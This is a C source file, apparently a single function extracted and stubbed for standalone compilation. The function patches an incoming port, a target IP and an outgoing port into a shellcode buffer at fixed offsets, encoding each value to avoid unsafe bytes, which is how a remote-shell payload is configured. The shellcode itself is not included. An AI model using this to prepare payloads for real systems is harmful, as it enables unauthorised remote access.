#define NULL ((void*)0)
typedef unsigned long size_t;  // Customize by platform.
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;  // Either arithmetic or pointer type.
/* By default, we understand bool (as a convenience). */
typedef int bool;
#define false 0
#define true 1

/* Forward declarations */

/* Type definitions */

/* Variables and functions */
 int find_safe_offset (int) ; 
 int inet_addr (char*) ; 
 int ntohs (int) ; 

void patchcode(char *shellcode, int PORT_IN, char *IP, int PORT_OUT) {
	
	int PORT_IN_A = ((ntohs(PORT_IN) << 16) + 2);
	int PORT_IN_B = find_safe_offset(PORT_IN_A);	

	int IP_A = inet_addr(IP);
	int IP_B = find_safe_offset(IP_A);

	int PORT_OUT_A = ((ntohs(PORT_OUT) << 16) + 2);
	int PORT_OUT_B = find_safe_offset(PORT_OUT_A);	

	*(int *)&shellcode[134] = (PORT_IN_A - PORT_IN_B);
	*(int *)&shellcode[141] = PORT_IN_B;

	*(int *)&shellcode[205] = (IP_A - IP_B);
	*(int *)&shellcode[212] = IP_B;
	
	*(int *)&shellcode[217] = (PORT_OUT_A - PORT_OUT_B);
	*(int *)&shellcode[224] = PORT_OUT_B;

}